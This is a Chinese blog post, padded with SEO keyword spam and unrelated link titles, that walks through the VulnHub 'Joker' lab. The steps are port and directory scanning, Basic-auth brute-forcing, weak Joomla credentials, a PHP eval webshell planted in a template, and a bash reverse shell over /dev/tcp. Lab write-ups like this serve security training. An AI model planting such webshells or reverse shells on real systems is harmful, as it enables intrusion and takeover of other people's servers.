当前位置: 首页 > news >正文

网站pv统计方法深圳logo设计公司哪家好

网站pv统计方法,深圳logo设计公司哪家好,保定手机网站建设,网站备案文件吗靶场下载链接 https://download.vulnhub.com/ha/joker.zip 将kali和joker,桥接模式 获取靶场ip arp-scan -l 使用nmap扫描 nmap -sS -sV -p- 访问80端口什么都没有发现 访问8080端口发现 用drib进行目录扫描 dirb "http://192.168.117.157" -X .txt,php,json,html…

靶场下载链接

 https://download.vulnhub.com/ha/joker.zip

 将kali和joker,桥接模式

获取靶场ip

arp-scan -l

使用nmap扫描

nmap -sS -sV -p- 

 访问80端口什么都没有发现

访问8080端口发现

用drib进行目录扫描 

dirb "http://192.168.117.157" -X .txt,php,json,html

访问secret.txt发现

 登录

使用登录,进行抓包

Authorization:后面的是账号密码的base64形式

发送到攻击器 

打开kali自带字典,复制字典一部分,整个复制了最好

爆破时会用到

cd /usr/share/wordlists

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz 

cat rockyou.txt

新建一个a.txt将字典复制的放入 

爆破设置

2的时候从文件加载选择a.txt 

 

点击攻击后得到密码 

解码base64

成功登录 

 账号密码弱口令登录,尝试用joomla

点击Site Administrator

因为刚才的弱口令登录成功,所以这个的账号密码都是joomla

 进去后点击Templates

 木马

 选择一个文件编辑

 创建一个新文件编辑,写入一句话木马

 点击左上角保存

<?php @eval($_POST["cmd"]);?>

 蚁剑连接成功

反弹shell

再建立一个a.php

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.117.157/6666 0>&1'");?>

使用kali开启对6666端口的监听 

 

 访问http://192.168.117.157:8080/templates/beez3/html/a.php

 kali收到监听消息,反弹shell结束

http://www.dtcms.com/a/491900.html

相关文章:

  • 软件测试— 测试分类
  • 三井物产商品预测竞赛思路
  • 各省住房和城乡建设厅网站南宁公司做seo
  • 网站如何建数据库淘宝建设网站的理由
  • 网站建站建设价格怎么开通自己的微信小程序
  • 网站用户界面设计宁波网站建设服务商
  • 笔试强训(五)
  • 网站建设服务合同印花税做任务赚q红包的网站
  • 多媒体在网站开发的分析安装wordpress 500
  • Flask框架网站
  • 工业视觉网关:RK3576赋能多路检测与边缘AI
  • 鞋帽网站欣赏wordpress 文章公开编辑
  • 茂名营销网站开发室内设计学校大专
  • 网站备案 申请给网站写教案做课件一节课多少钱
  • 项目信息版本混乱,该如何统一
  • 使用Mathematica对Duffing方程进行非线性分析
  • 企业微信公众平台企业网站怎么搜索优化
  • Maya python重命名工具
  • 阜阳建设网站公司电话国内做进口的电商网站
  • 深入浅出 AES 加密算法与 Go 语言实战
  • 酒店网站htmlwordpress导航悬浮
  • 分布式与长序列attention
  • 南京做网站群的公司怎么免费开网站
  • axios使用过程
  • php编程软件关键词优化的策略
  • 网站建设的认识个人网站建设 实验报告
  • 搭建个人博客--hexo
  • 今天我们继续学习python3编程之python基础
  • 做网站怎样找1 网站建设的目标是什么
  • 手机网站建设哪里好网页制作工具程